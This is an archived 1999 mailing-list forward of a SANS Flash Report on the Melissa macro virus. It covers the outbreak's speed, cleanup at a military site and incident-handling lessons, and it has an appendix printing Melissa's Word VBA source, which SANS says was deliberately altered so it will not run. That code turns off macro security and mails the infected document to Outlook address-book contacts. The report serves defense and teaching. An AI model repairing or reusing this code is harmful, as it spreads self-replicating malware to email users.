[Date Prev] | [Thread Prev] | [Thread Next] | [Date Next] -- [Date Index] | [Thread Index] | [interesting-people Home]
Subject: IP: EXTRA: SANS Flash Report on the Melissa Virus (fwd)
>Date: Mon, 29 Mar 1999 13:14:36 -0800 (PST)
>From: Michael Dillon <michael@memra.com>
>To: farber@cis.upenn.edu
>Subject: EXTRA: SANS Flash Report on the Melissa Virus (fwd)
>Organization: Memra Communications Inc.
>
>
>This is an excellent summary of the Melissa virus event and shows how
>vulnerable Microsoft's Word and Excel and Access products are even at
>military sites. One point that wasn't made clear by the SANS author was
>that Microsoft has designed Word documents with a built-in virus carrier
>in the form of the AUTOEXEC macro. The same virus carrier is built into
>other Microsoft products and possibly other manufacturers as well.
>
>Up until now the reaction to these sorts of security incidents has been
>focused almost solely on the identification of a specific attack and
>cleanup after the attack. But no mention is made of fixing the weakness
>that makes these attacks possible by completely separating data and
>programs so that it is not possible for naive users -- the majority of us
>-- to inadvertently run a program when our intention is merely to read a
>data file.
>
>Attacks like the Melissa virus make the news because they are designed to
>wreak havoc in a visible way. But how many more of these viruses are out
>there that are silently collecting data and then removing themselves from
>the system that they infected? This is where the real security problem
>lies and it appears that the US military is vulnerable to such an attack.
>
>--
>Michael Dillon - E-mail: michael@memra.com
>Check the website for my Internet World articles - http://www.memra.com
>
>
>---------- Forwarded message ----------
>Date: Mon, 29 Mar 1999 15:33:06 -0500 (EST)
>From: sans@clark.net
>To: michael@memra.com
>Subject: EXTRA: SANS Flash Report on the Melissa Virus
>
>To: Michael Dillon SD210249
>From: Rob Kolstad, SANS E-mail Concierge
>Re: EXTRA: SANS Flash Report on the Melissa Virus
>
>Once or twice a year, the magnitude of a security event is great enough
>to merit a SANS Flash Report. It is amazing and coincidental that it
>happens in the same 24 hour period that we send out the first SANS
>Newsbites.
>
>NOTE: SANS will be changing email and web servers this week. We hope
>to avoid service interruptions, but some error might creep in. Problems
>to <kolstad@delos.com>.
>
>Table of Contents:
> 1. What Melissa teaches us
> 1.1 Infection Speed
> 1.2 Collateral Damage
> 1.3 Need for Defense in Depth
> 2. One site's experience in cleaning up after a Melissa infestation
> 3. Conclusion
> Appendix: Melissa Source Code
>
>You will already have heard of the Melissa virus, at least from the SANS
>Newsbites, and probably also from newspapers and friends, as well. An
>excellent description of the virus, including how to identify it and
>contain it at the host level, was developed by the Computer Emergency
>Response Team at Carnegie Mellon University. This document is available
>at: http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html .
>
>The major anti-virus vendors have already released descriptions and
>anti-viral signatures. URLs for NAI and Symantec are listed below:
> http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
> http://www.symantec.com/avcenter/venc/data/mailissa.html
>
>The rapid response of these organizations has been very impressive, and
>your response should be equally rapid. If you have not yet taken the
>steps described in the CERT advisory, follow the instructions referenced
>above and get your site's virus signatures updated and the infected
>machines contained and cleaned. Then read the rest of this document
>that tells some of the lessons learned and also the bigger picture
>surrounding the Melissa Macro virus. We discuss the implications of
>information gathering viruses like Melissa, the process and impact of
>cleaning up after an outbreak at a military site and finally, share a
>non-working version of the code to help you understand what these viruses
>do.
>
>1. What Melissa teaches us
>
>1.1 Infection Speed
>
>According to NAI's web site listed above, the virus was first discovered
>on an "alt.sex" newsgroup and spread rapidly. On the same day the virus
>was first discovered "in the wild" it caused major infections and reports
>from a large number of Department of Defense and Department of Energy
>sites. Many of you will probably find out today that your site has been
>infected as well. This serves as a warning how fast a virus with an
>unknown signature can spread. A modified, non-operative copy of the
>source code is included as an appendix to this document. If you search
>the listing for the string "For y = 1 To", you can see how the virus
>replicated so rapidly by going through Microsoft Outlook address books
>and sending itself to the first 50 entries in each book. Sections in
>the code that have been the subject of news reports are marked with
>comments that begin with ***.
>
>Useful Background Information: In the March 2nd SANS First Tuesday
>Intrusion Detection Web Broadcast, archived at
>http://www.sans.org/webarchives.htm, Stephen Northcutt described another
>MS Word Macro Virus, M97.Marker.a. Marker is an information gathering
>virus which uses FTP to send the Microsoft Office registration information
>of infected systems to outside organizations. Northcutt described how
>this same technique would allow a prospective attack to develop an
>infection map and by knowing who sends what to whom, to target future
>attacks.
>
>1.2 Collateral Damage
>
>The Melissa virus apparently does not create any other damage in the
>sense of deleting, or stealing files. However, when the smoke clears,
>the cost of dealing with Melissa will be measured in the millions of
>dollars. It also directly affects sites' ability to send and receive
>email. One network engineer, who worked at one of the first sites to
>report the problem last Friday March 26, said "I knew something was
>wrong before I knew what was wrong. I could feel the network going
>slower and slower. As I looked into it, I found the exchange mail
>servers were melting down." One of the lessons of Melissa is that a
>macro virus can hit very fast and very hard. The engineer went on to
>say, "As I composed the last email of the day, a message hit the Inbox
>of my Microsoft Outlook email application. The subject line read:
>"Important Message From [Jane Doe]". I viewed the message, and the body
>read "Here is that document you asked for... don't show anyone else ;-)"
>Attached was a Microsoft Word document titled "list1.doc".
>
>"Although I hadn't requested any documents from [Jane Doe], I was
>expecting a couple of them from other people. It wasn't inconceivable
>to think that she had become involved, even though I didn't know who
>she was. I double-clicked on the Word document. A pop-up window appeared,
>warning me that a macro was contained in the document, and that macros
>can potentially be dangerous. I knew that... :-) So, I shut down the
>Word application, and checked the document with several of the virus
>detection packages that I had. Everything appeared clean."
>
>"Since this was from someone in my organization, apparently a trusted
>source, I went ahead and opened the document with the macros enabled.
>In less than a second, a duplicate of the message had hit my mailbox,
>this time with my name attached. I hit the power-off button on my
>computer, but it was late. The payload had been delivered. My name
>was now attached to a file containing pornographic web sites, and an
>apparent username and password for each site. Moments later, duplicate
>messages from others who had made the same mistake began to appear."
>
>"At this point I knew we, as an organization, were in trouble. This
>virus (or worm) was snowballing fast, too fast. I immediately called
>our information systems security manager, only to find that his phone
>was already busy. I left a voicemail detailing my appraisal of the
>situation, and my fear that this incident could get serious... very
>quickly. What I didn't know was that I was too late, it was already
>*very* serious."
>
>1.3 Need for Defense in Depth
>
>Though Melissa is primarily spread by e-mail, passing an infected floppy
>disk works just as well to move the virus to a new system, possibly even
>a new organization. If there was ever any doubt about whether we need
>to take virus countermeasures seriously, that time is past. We recommend
>virus scanning at the firewall, on servers, and on the desktop systems
>as well as physical entry points for magnetic media for sites that want
>to avoid the kind of punch Melissa exhibited.
>
>2. One site's experience in cleaning up after a Melissa infestation
>
>Here's a first-person description of the process one site used to clean
>up after being hit by Melissa.
>
>"As soon as we discovered the virus late Friday afternoon, we disconnected
>our servers (all SMTP relays and Exchange servers at our Internet
>connection) from the network until we could contain the infection. This
>happened at approximately 1800 hours Friday.
>
>"System administrators for both corporate and departmental Exchange
>servers worked through Friday night and well into Saturday. Many returned
>Saturday and again on Sunday to complete the isolation and cleanup. They
>cleaned up the Exchange servers with updated anti-viral signatures as
>soon as they were available. The corporate servers and one departmental
>server were ready to come back on-line late Sunday. We left IMS (Internet
>Mail Service) disabled until we could contain (filter) email at the SMTP
>server.
>
>"Our version of sendmail is one removed from the latest and filter
>updates provided by the author would not work on our version. We resorted
>to getting the word out for ALL users to update the AV signatures and
>refrain from sending Word docs until any with macros had been identified
>as coming from trusted sources. The administrator for the SMTP relay
>host downloaded a trial version of InterScan VirusWall from TrendMicro.
>For more info, see: http://www.antivirus.com/products/isvw/index.htm
>
>"The clean-up picture would have been much bleaker if we hadn't had so many
>things in our favor:
>* System administrators were still at work when the problem started
> (approximately 1640 on Friday).
>* Most of the users were gone for the weekend (and didn't compound the
> problem by manually sending additional copies of the infected document).
>* All of the system administrators involved in the clean up had been trained
> in incident handling based on the SANS' Incident Handling Step by Step
> approach.
>* The person who needed to make key decisions was trained in incident
> response and had already begun carrying a cell phone.
>* Base commanders recognized the expertise that was in use and supported
> the Incident Handling team by not directing what needed to be done (at
> least so far)."
>
>Note: The stages of incident handling are: preparation, identification,
>containment, eradication, and follow-up. The URLs at the beginning of
>this document can help you with identification and eradication. Your
>organization may need to consider email server down time in order to
>achieve containment. You may also want to consider setting up non-email
>communication channels for your organization. If you do not know how
>to build a telephone call tree, look for a "soccer mom". They know how
>to spread important information very efficiently. In this way, if you
>do suffer an email meltdown, you can still get important information,
>such as where to acquire the latest anti-virus software, to your users.
>
>3. Conclusion
>
>Because Melissa exploits one of the most valuable benefits of the net
>-- the ability to share documents -- to propagate and to multiply itself,
>it will affect far more people far more quickly than earlier viruses.
>The silver lining in this cloud is that a relatively benign virus like
>Melissa is a low-cost way of gaining user awareness. That same mechanism
>can be used by a more malicious attacker to make private information
>public and to destroy large amounts of important data. It makes sense
>for you to use this opportunity to establish three capabilities if you
>have not already done so:
>(1) user responsibility and active involvement in protecting their
> systems
>(2) an incident handling capability (Order Incident Handling Step-by-Step
> from the SANS bookstore www.sans.org if you don't already have a roadmap)
>(3) user awareness of what to look for, whom to call, and what to say
> when they call about a security threat.
>
>In addition, we at SANS want to hear your experiences and the lessons
>you learned in responding to Melissa. Please send your Melissa-related
>tips, tricks, techniques, experiences and lessons learned to info@sans.org
>with Melissa in the subject line. This type of sharing can help all
>sites be in a better position to respond the next time an event like
>this occurs.
>
>Appendix: Melissa Source Code
>
>NOTE: Several errors have been introduced into this copy of the code as
>a safety measure. It will not run in this form. We hope the code we
>changed will not overly impact your opportunity to understand how the
>software works, but we could not be responsible for furthering the spread
>of the live version of Melissa. Text comments have been inserted at
>the "famous" locations preceded by three asterisks "***"
>
>*** Begins by checking security, the environment, and whether already
>infected
>
>Private Sub Document_Open()
> On Error Resume Next
> If System.PrivateProfileString("",
> "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
> "Level") <> "" Then
> CommandBars("Macro").Controls("Security...").Enabled = False
> System.PrivateProfileString("",
> "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
> "Level") = 1&
> Else
> CommandBars("Tools").Controls("Macro").Enabled = False
> Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
> Options.SaveNormalPrompt = (1 - 1)
> End If
>
>Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
>Set UngaDasOutlook = CreateObject("Outlook.Application")
>Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
>If System.PrivateProfileString("",
> "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <>
> "... by Kwyjibo" Then
> If UngaDasOutlook = "Inlook" Then
> DasMapName.Logon "profile", "password"
> For y = 1 To DasMapName.AddressLists.Count
> Set AddyBook = DasMapiName.AddressLists(y)
> Set BreakOffASlice = UngaDasOutlook.CreateItem(0)
> For oo = 1 To AddyBook.AddressEntries.Count
> Peep = AddyBook.AddressEntries(x)
> BreakOffASlice.Recipients.Add Peep
> x++
> If x < 50 Then oo = AddyBook.AddressEntries.Count
> Next oo
> BreakOffASlice.Subject = "Important Message From " &
> Application.UserName
> BreakUmOffASlice.Body =
> "Here is that document you asked for ... don't show anyone else ;-)"
>
>*** Here is the classic subject line "Important Message From" This could
>change of course in future versions ***
>
> BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
> BreakUmOffASlice.Send
> Peep = ""
> Next y
> DasMapName.Logoff
> End If
> System.PrivateProfileString("",
> "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") =
> "... by Kwyjibo"
>End If
>Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
>Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
>NTCL = NTI1.CodeModule.CountOfLines
>ADCL = ADI1.CodeModule.CountOfLines
>BGN = 2
>If ADI1.Name <> "Melissa" Then
> If ADCL > 0 Then _
> ADI1.CodeModule.DeleteLines 1, ADCL
> Set ToInfect = ADI1
> ADI1.Name = "Melissa"
> DoAD = True
> End If
> If NTI1.Name <> "Melissa" Then
> If NTCL > 0 Then _
> NTI1.CodeModule.DeleteLines 1, NTCL
> Set ToInfect = NTI1
> NTI1.Name = "Melissa"
> DoNT = True
> End If
> If DoNT <> True And DoAD <> True Then GoTo END
> If DoNT = True Then
> Do While ADI1.CodeModule.Lines(1, 1) = ""
> ADI1.CodeModule.DeleteLines 1
> Loop
> ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
> Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
> ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
> BGN = BGN + 1
> Loop
> End If
> If DoAD = True Then
> Do While NTI1.CodeModule.Lines(1, 1) = ""
> NTI1.CodeModule.DeleteLines 1
> Loop
> ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
> Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
> ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
> BGN = BGN + 1
> Loop
> End If
>CYA:
> If NTCL <> 0 And ADCL = 0 And
> (InStr(1, ActiveDocument.Name, "Document") = False) Then
> ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
> ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
> ActiveDocument.Saved = True
> End If
>'WORD/Melissa written by Kwyjibo
>'Works in both Word 2000 and Word 97
>'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
>'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
>
>If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
> plus triple-word-score, plus fifty points for using all my letters.
> Game's over. I'm outta here."
>
>End Sub
>
>*** The lines above are some of the most published information about
>this virus. Though you can look for the virus with intrusion detection
>and other string matching security tools by searching for keywords like
>"Kwyjibo", simple modifications of the code could change these. ***
[Date Prev] | [Thread Prev] | [Thread Next] | [Date Next] -- [Date Index] | [Thread Index] | [interesting-people Home]
Powered by eList eXpress LLC